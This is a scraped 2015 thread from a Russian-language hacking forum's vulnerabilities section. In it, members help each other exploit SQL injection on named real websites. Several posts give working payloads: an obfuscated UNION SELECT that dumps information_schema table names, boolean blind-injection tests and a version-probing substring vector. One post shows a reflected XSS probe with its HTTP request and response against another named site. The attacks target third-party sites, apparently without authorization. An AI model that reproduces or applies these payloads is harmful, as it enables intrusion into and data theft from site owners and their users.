HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #791  
Старый 27.10.2015, 20:22
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

а blind работает и без procedure analyse
а как составить вектор для blind работает и без procedure analyse?
 
Ответить с цитированием

  #792  
Старый 27.10.2015, 23:57
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

хотя я забыл еще уточнить, в запросе есть order by?
да есть я писал об етом

Цитата:
Сообщение от yarbabin  
yarbabin said:

а blind, как обычно, and substring(version(),1,1)=5
после лимита "and" как это?
 
Ответить с цитированием

  #793  
Старый 28.10.2015, 00:22
ButilkaSoka
Guest
Сообщений: n/a
Провел на форуме:
7285

Репутация: 0
По умолчанию

Хелп.

Тема такая, не могу вывести данные.

Код:
Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+  or ''='
в schema_name есть twinsspe_twins, но не выводится из неё инфа.

скорей всего нету там просто ничего.
 
Ответить с цитированием

  #794  
Старый 28.10.2015, 09:35
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от ButilkaSoka  
ButilkaSoka said:

Хелп.
Тема такая, не могу вывести данные.
Код:
Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,/*!unhex(hex(group_concat(table_name)))*/,26,27,28,29 from {f information_schema.tables} --+  or ''='
в schema_name есть twinsspe_twins, но не выводится из неё инфа.
скорей всего нету там просто ничего.
Ты работаешь под этой БД. В твоем запросе как раз и выводятся таблицы из этой БД.
 
Ответить с цитированием

  #795  
Старый 29.10.2015, 00:45
Paladin
Guest
Сообщений: n/a
Провел на форуме:
290

Репутация: 0
По умолчанию

http://kvestsetevichok.ru/index.php/press?view=category&id=' что то можно сделать? ибо не получается изменить запрос никак
 
Ответить с цитированием

  #796  
Старый 29.10.2015, 10:43
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от Paladin  
Paladin said:

http://kvestsetevichok.ru/index.php/press?view=category&id='
что то можно сделать? ибо не получается изменить запрос никак
Зачем вы кавычку вконце поставили я вообще не пойму.

Unknown column 'root' in 'where clause'

Обычная ошибка бд, никакой sql inj
 
Ответить с цитированием

  #797  
Старый 31.10.2015, 01:04
xivi00
Guest
Сообщений: n/a
Провел на форуме:
11341

Репутация: 0
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:

Ребят, по сайту. Что дальше делать, кто-нибудь может показать пример для вывода чего-нибудь из information schema к примеру? sqlmap не может ничего вывести,хотя boolean уязвимость явно есть. Придётся вручную.. просто натолкните на верный путь плиз)
Сабж:
Код:
Code:
http://indigital{GOOGLEINDEX}images.com/indigital/{GOOGLEINDEX}ecommerce/catalogo.do?tab_07=1800&tab_06=2619+and+1=1&tab_09=1343&tab_04=1348
И где там уязвимость?*
 
Ответить с цитированием

  #798  
Старый 31.10.2015, 01:06
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Цитата:
Сообщение от xivi00  
xivi00 said:

И где там уязвимость?*
ну как бы, tab_06

tab_06=2619+and+1=1 [true=>корректрый вывод]

tab_06=2619+and+1=2 [false=>пустой вывод]
 
Ответить с цитированием

  #799  
Старый 31.10.2015, 01:16
xivi00
Guest
Сообщений: n/a
Провел на форуме:
11341

Репутация: 0
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:

ну как бы, tab_06
tab_06=2619+and+1=1 [true=>корректрый вывод]
tab_06=2619+and+1=2 [false=>пустой вывод]
Извеняюсь протупил
 
Ответить с цитированием

  #800  
Старый 01.11.2015, 18:09
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Хорошо другой вопрос ssh-shop.in/captcha/?route=captcha">prompt(947944)
Код:
Code:
GET /captcha/?route=captcha">prompt(947944) HTTP/1.1
Host: ssh-shop.in
Код:
Code:
HTTP/1.1 200 OK
...
prompt(947944)">
prompt(947944)">
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ